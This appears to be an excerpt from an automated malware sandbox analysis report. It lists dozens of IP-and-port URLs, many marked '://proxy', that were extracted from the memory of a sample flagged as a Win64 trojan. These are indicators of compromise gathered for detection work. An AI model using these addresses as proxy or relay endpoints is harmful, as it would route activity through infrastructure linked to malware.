                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6684000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.36.190:222
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C667B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.36.190:222://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.79.234:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.79.234:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.95.81:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.95.81:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.192:27181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.192:27181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.193:11087
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.193:11087://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.194:20304
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.194:20304://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.195:29240
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.195:29240://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.197:14990
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.197:14990://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.198:20986
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.198:20986://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.199:20283
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.163.199:20283://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.8.91
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.144.8.91://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.171.217.48:7890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.171.217.48:7890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.171.217.48:7891
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.171.217.48:7891://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.187.50.99:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.187.50.99:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.221.242.131:9999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.221.242.131:9999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.239.234.43:7302
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.239.234.43:7302://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.242.252.174:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.242.252.174:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.160
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.160://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.160:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.164
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.164://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.164:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.167
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.167://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.167:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.41.203.27
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.41.203.27://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.41.203.27:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.74.158.40:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.74.158.40:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.74.159.39:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.74.159.39:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.77.148.253:2019
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.77.148.253:2019://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.79.34.201:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.79.34.201:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.85.86.114:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.85.86.114:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.124:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.124:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.48.140:33739
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.48.140:33739://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.21:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.21:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.130.233.22:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.130.233.22:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.170.17:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.170.17:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.235.157:63135
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.235.157:63135://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C674C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.28.43
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.28.43://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.28.43:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.49.36
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.49.36://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.49.36:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.204.160.111:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.204.160.111:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.206.56.142:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.206.56.142:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.206.61.201:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.206.61.201:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.142.231:33427
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.142.231:33427://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.144.223:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.144.223:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.214.24.188:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.214.24.188:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.242.89.230:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.242.89.230:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.68.172.169:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.68.172.169:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.90.229.186:47694
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.90.229.186:47694://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C675D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.96.92.214:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.96.92.214:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.97.71.42:5305
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.97.71.42:5305://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.102.115.154:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.102.115.154:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.102.197.136:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.102.197.136:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.102.72.114:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.102.72.114:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA617000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:8899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:8899://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.131:8899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.131:8899://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.132
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.132://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.132:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.132:8899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.132:8899://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.133
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.133://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.133:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.133:8899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.133:8899://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C94C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:8899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:8899://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.138:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.138:8899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.138:8899://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163
